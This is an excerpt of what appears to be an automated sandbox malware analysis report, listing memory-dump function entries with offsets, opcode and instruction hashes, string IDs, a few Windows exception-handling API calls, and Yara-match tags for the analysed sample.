                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0Z@$Z@
                                          • API String ID: 0-605451032
                                          • Opcode ID: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                          • Instruction ID: c2704d3dc0eafd102a63da391050ffa25cdd35e93d0e938198e091b07b9d6d51
                                          • Opcode Fuzzy Hash: a43c74f0a017d1f7b27258233af7b0f8bd5ab01d46b0208e3573d12e86ff0486
                                          • Instruction Fuzzy Hash: 7AC1DE709006079ECB34CE69C584A7BBBB1AB45304F184A3FD452BBBD2C339AC59CB59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$H@
                                          • API String ID: 0-2786613154
                                          • Opcode ID: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                          • Instruction ID: 4a3fd9315a5abbba8fc5c956050257a45ee5a7b78c0dcd4935651e2db0378757
                                          • Opcode Fuzzy Hash: ca813c29726484238c91fef20f317be1219e422960450490370ba48bfc0cd99d
                                          • Instruction Fuzzy Hash: 9CB1E57090460B8BDB24CE6AC555ABFB7A1AF05304F140E3FD592B77C1C739A926CB89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: s-o
                                          • API String ID: 0-3378344198
                                          • Opcode ID: 601adb45fe0a4c4e654cc042b6bebaa457e26a2d13cbdcc8dab42b60792ab6b5
                                          • Instruction ID: 1bc68b86348676d521a2ce8bc1f74dab2c0095c9f026226ac75e8e6b1b205ee2
                                          • Opcode Fuzzy Hash: 601adb45fe0a4c4e654cc042b6bebaa457e26a2d13cbdcc8dab42b60792ab6b5
                                          • Instruction Fuzzy Hash: 046227F390C604AFE7087F29EC8567ABBE5EB94320F1A493DEAC583744E63558048697
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                          • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                          • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                          • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B55950,?,?,00000008,?,?,04B5C8B1,00000000), ref: 04B55B82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction ID: ba50544f523060c0a6736937386c4431d997213096af904f056ed3708bfff8ac
                                          • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction Fuzzy Hash: 5BB12F31610608EFD725CF28C48AB65BBE0FF45366F158698E899CF2B5D335E982CB40
                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004156E9,?,?,00000008,?,?,0041C64A,00000000), ref: 0041591B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction ID: 5bcf9fd90164e7ff1602427bca0bed587a5bb36a9d426d5c8fdac6ccf5812400
                                          • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction Fuzzy Hash: 72B16C71520A08CFD715CF28C48ABE57BE0FF85364F258659E8A9CF2A1C339D992CB45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                          • Instruction ID: 15ef50e40650bd514aed51c347d3cc3ef44e8e021ca7818228c13fa78afeac38
                                          • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                          • Instruction Fuzzy Hash: 73C10034A006069FDF24CFACC584ABABBB1FFC5304F144699E89297A91D730F905EB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                          • Instruction ID: b628de6dd17282465361dc5d56a9a12fbdfc830929330daf0a04bcf208f89b46
                                          • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                          • Instruction Fuzzy Hash: 83C1DE70A006068EDB29CF68C588BBABBB1FF45304F18CE59D49A976D1E331F945CB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                          • Instruction ID: b87c0db0fb9a2703eaf05aca8493a80bd2893d7928b472b6e39a53226a4da8cd
                                          • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                          • Instruction Fuzzy Hash: 2EB1C330A0060A9BEB64CF78C554ABEB7B1FFC4304F040A9DE59697690D731F601EB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                          • Instruction ID: 65f3f24c76de2cb4eee7da6f8960c561aa8ffef6e1f1bc5b49752115257ec335
                                          • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                          • Instruction Fuzzy Hash: 35B1B070B0060A9BDB289FA8C994BBEBBA1FF45304F04CE1ED59297AD0D631F501CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ]?
                                          • API String ID: 0-4197553934
                                          • Opcode ID: 0ae2101988d4c7d63bc9530ff75421b1a513c3497375c428da7d177cd8bd5adc
                                          • Instruction ID: 5114bcf77f73b7f7b6f0e9df39c6fe5046d72ba7487c92a611b329a3628b07be
                                          • Opcode Fuzzy Hash: 0ae2101988d4c7d63bc9530ff75421b1a513c3497375c428da7d177cd8bd5adc
                                          • Instruction Fuzzy Hash: 738138B3E092148BE3086E3DDD1977ABBD6EBC4310F1B463DDAC9837C4E93958458686
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04B4A2CB), ref: 04B4A94C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                          • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                          • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                          • Instruction Fuzzy Hash:
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                          • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                          • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                          • Instruction Fuzzy Hash:
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w+m
                                          • API String ID: 0-864200604
                                          • Opcode ID: 3e2d02cb09356813a080c61e82cd5f9b31a5aa119870f1b88f08d74786f3cfa6
                                          • Instruction ID: 7c015de6003ac035b39fdf72ae7d025526fffd1a1ccc1ba5b21b38d7a9f54008
                                          • Opcode Fuzzy Hash: 3e2d02cb09356813a080c61e82cd5f9b31a5aa119870f1b88f08d74786f3cfa6
                                          • Instruction Fuzzy Hash: 454179B3A1C2184FE3106D7D9C14763BBC9DB456B0F268A3EEA84D7784EC66880542D5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8. 0
                                          • API String ID: 0-2505404598
                                          • Opcode ID: fb79eeece4fc5ab4c61f37ca659ae4f7e2a57d25f9eb7044de2a5d7742545e43
                                          • Instruction ID: 8029796dc23f979603f21c2f10f9d3ce475d0ecc7a105066fd5fa2c6632700f0
                                          • Opcode Fuzzy Hash: fb79eeece4fc5ab4c61f37ca659ae4f7e2a57d25f9eb7044de2a5d7742545e43
                                          • Instruction Fuzzy Hash: 984124F3B085145BE7106A3DEC4977FBBE9DBC8220F16463DEA88D7784E93058058392
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                          • Instruction ID: 9eba7d26b4c30fb0231ca0f4fdc35c0748861542a6683b4286b29558263be51c
                                          • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                          • Instruction Fuzzy Hash: 6E322322E29F016DD7239A35E932335A689AFB73D4F55C737EC1AB59A5EB28D0834100
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                          • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                          • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                          • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16a30d88279c0e2a87e3793dfe0712ee6ad285250f9d57745fe4f50436d948b7
                                          • Instruction ID: ae141eb6f5e049c6ad0db3183ac1814f19b76dccf46d1d64c32782b3f54f15b7
                                          • Opcode Fuzzy Hash: 16a30d88279c0e2a87e3793dfe0712ee6ad285250f9d57745fe4f50436d948b7
                                          • Instruction Fuzzy Hash: 9302E5F350C304AFE704AE29DC8577ABBE5EF94720F1A492DEAC4C7344EA3598448796
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction ID: 44d9c47c0291f05a3910f882056f69193e51d7448e839e206b2a355c1374ebfe
                                          • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                          • Instruction Fuzzy Hash: 09B14A31210609AFDB15CF28D48AB657BE1FF45364F298658E8D9CF2B1C335E992CB40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3595bf8689c9c730eaedf602729ba586f0d79dbb6a4592d2b7dd6e1d3529a670
                                          • Instruction ID: aed083e95b4bad3ee768542a7c39fe35ea9d7de519a7f6b52c1684139435e21d
                                          • Opcode Fuzzy Hash: 3595bf8689c9c730eaedf602729ba586f0d79dbb6a4592d2b7dd6e1d3529a670
                                          • Instruction Fuzzy Hash: 3071D9F3A086049FE3049E3DED8477ABBD6EBD4720F19C63DA6C4C3788E93848058656
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79978df43cdf85d2e41e69b35b16eadcb881fc8d1ead7ae1db67c1e7bcb824d1
                                          • Instruction ID: 6e8e1f1fe4d753c7625425816153feb0972385b1f0b259dc65eca961e033c60e
                                          • Opcode Fuzzy Hash: 79978df43cdf85d2e41e69b35b16eadcb881fc8d1ead7ae1db67c1e7bcb824d1
                                          • Instruction Fuzzy Hash: 1E5147F39186146FF3185E28DC947BAB7DAEB94330F2A823DE7D5937C4D97948018286
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74eaed204fd0dea69bd7e8b40b60da831e21f2619422e24f364ddf116962e1b8
                                          • Instruction ID: abe15b27139831ca1a2cf36df8837b514a4b853c7eb3663819b5ea5c1a66be3f
                                          • Opcode Fuzzy Hash: 74eaed204fd0dea69bd7e8b40b60da831e21f2619422e24f364ddf116962e1b8
                                          • Instruction Fuzzy Hash: 975167B3A093249FE3086E3DEC5977BBBE8EF84320F16492DE585C7780E974494486C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_aa9000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67e6905b917c249376d5bc3d0d4bc90d80550c35c94cebcfa0ee6bd46b0a0c71
                                          • Instruction ID: 66f72c06ad82e4324308b9a30eefe189ab837c067cabb0f88e519c693fe67f6b
                                          • Opcode Fuzzy Hash: 67e6905b917c249376d5bc3d0d4bc90d80550c35c94cebcfa0ee6bd46b0a0c71
                                          • Instruction Fuzzy Hash: 6E61052114E7C29FC71B8B30486A595BFA0BD0321430ACBEFC4D58BDA3E7149859C7A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c91dbb15d6cd903e1d9cf44c63c4c73b8fdc7e72e6ae1a04340fb9b1a6736736
                                          • Instruction ID: 15d653ffdd5e050bcfd961dbeb58cb1a27e8984e11735ee0865ad47b8247658f
                                          • Opcode Fuzzy Hash: c91dbb15d6cd903e1d9cf44c63c4c73b8fdc7e72e6ae1a04340fb9b1a6736736
                                          • Instruction Fuzzy Hash: 864135F39082189BE314BD78EC5577ABBD9EB50320F1B463DEAD487780EA76590083D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_aa9000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a2017e0b9128bc4982105f8fbd9b01d22b2d613717012331f7b6af2ac16b5d8a
                                          • Instruction ID: a52b558dcc25b1bfd2f35e1fc871bc706e6453eada3f96e1d6bb3f4558f9841f
                                          • Opcode Fuzzy Hash: a2017e0b9128bc4982105f8fbd9b01d22b2d613717012331f7b6af2ac16b5d8a
                                          • Instruction Fuzzy Hash: FA51063514E7C19FC71B8B34487A595BFA0BD0321430ACBEFC8958B9A3E7189459C7A2
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                          • Instruction ID: d26ecd3be6f0aac91cfaf9ff7e3e69c37dba3b61adad34e3fb41b18180067497
                                          • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                          • Instruction Fuzzy Hash: 3E514AB2E00615DFDB24CF94D8917AAB7F4FB48314F24806AD405EB2A5D375E941CF98
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9a9000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f602b199f77d5a2f8fd3b56aa5a3eb60608953e804e14a306a71bb4578044c8
                                          • Instruction ID: aad966499eab7276edb88845bbd6edfe8b71a6b1f7737a6b059e718403fa9027
                                          • Opcode Fuzzy Hash: 5f602b199f77d5a2f8fd3b56aa5a3eb60608953e804e14a306a71bb4578044c8
                                          • Instruction Fuzzy Hash: C13168B250D610AFE305BF29D8816BEFBE9EF98361F27482DE6C583210DA3054418B97
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 25f78a4c53f05fe3a27fbf8246952dbb023ef4a234bc6e268b1c1bc8c2435672
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 7C11277724805343EA588AEDD4F86B7F395EBE5320B2C46FAD2814B75AD222F148F600
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: a218eebe701f303f833aa15dab785052099aaf317f2a1d17e3484f5e3946e42e
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: BC112B7720034143D614CA2DD9B87B7A796FBE532072DC37AD0924B7D4D222F545A600
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.00000000009A9000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9a9000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f08b9358d88e9f1580e6c94b348322eef91f5a1441a9d5f1b02d5ff5dc46e54e
                                          • Instruction ID: 16c424adc4985367f18a4bce07082ab681e40344ce865571843421409995f3c1
                                          • Opcode Fuzzy Hash: f08b9358d88e9f1580e6c94b348322eef91f5a1441a9d5f1b02d5ff5dc46e54e
                                          • Instruction Fuzzy Hash: 3C2158B282CB94EFC7497E24D8A5A3AF3E5FF00750F260D2DD1D282240D7785580EA83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEC000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_cec000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction ID: c374aa39776dee5f51400340137c7a0c72162bef656ba4047e8d3728d24eab6b
                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                          • Instruction Fuzzy Hash: 98117C72340144AFD754DE9ADCC1FA673EAEB88360B298065ED04CB356E675EC42D760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                          • Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609374987.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA9000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_aa9000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57f825a01b677f507934ec3e44805798b2075f600c9ae2c825d8feb518526f97
                                          • Instruction ID: ee9dbf19c6aec139c34d06db6aa2cf2ed116d83ae04526e42b6680c283ed8a20
                                          • Opcode Fuzzy Hash: 57f825a01b677f507934ec3e44805798b2075f600c9ae2c825d8feb518526f97
